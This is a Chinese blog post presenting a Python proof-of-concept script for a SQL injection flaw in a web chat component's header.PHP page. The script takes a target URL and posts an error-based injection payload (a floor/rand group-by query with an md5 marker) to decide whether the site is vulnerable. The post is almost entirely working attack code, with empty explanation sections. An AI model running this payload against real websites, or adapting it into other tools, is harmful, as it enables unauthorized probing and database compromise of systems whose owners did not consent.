Python 官方文档:入门教程 => 点击学习
一、演示一下的利用效果二、漏洞说明这次的PoC是验证sql注入,漏洞详情三、代码+注释import requests import argparse parser = argparse.ArgumentParser() parser.ad
一、演示一下的利用效果
二、漏洞说明
这次的PoC是验证sql注入,漏洞详情
三、代码+注释
import requests
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest="url")
args = parser.parse_args()
url = args.url
# 存在漏洞的页面
url += "/celive/live/header.PHP"
# 构造payload,用md5结果来验证
payload = {
'xajax': 'LiveMessage',
'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),"
"concat(floor(rand(0)*2),(select md5(888)))a"
" from infORMation_schema.tables group by a)b)"
",'','','','1','127.0.0.1','2') #"
}
try:
r = requests.post(url, data=payload)
if(r.status_code == requests.codes.ok):
if "0a113ef6b61820daa5611c870ed8d5ee" in r.text:
print("{} is SQL_vul".format(url))
else:
print("{} is not SQL_vul".format(url))
except Exception as e:
print(str(e))
--结束END--
本文标题: Python3实现PoC——wooyun
本文链接: https://www.lsjlt.com/news/192606.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
下载Word文档到电脑,方便收藏和打印~
2024-03-01
2024-03-01
2024-03-01
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0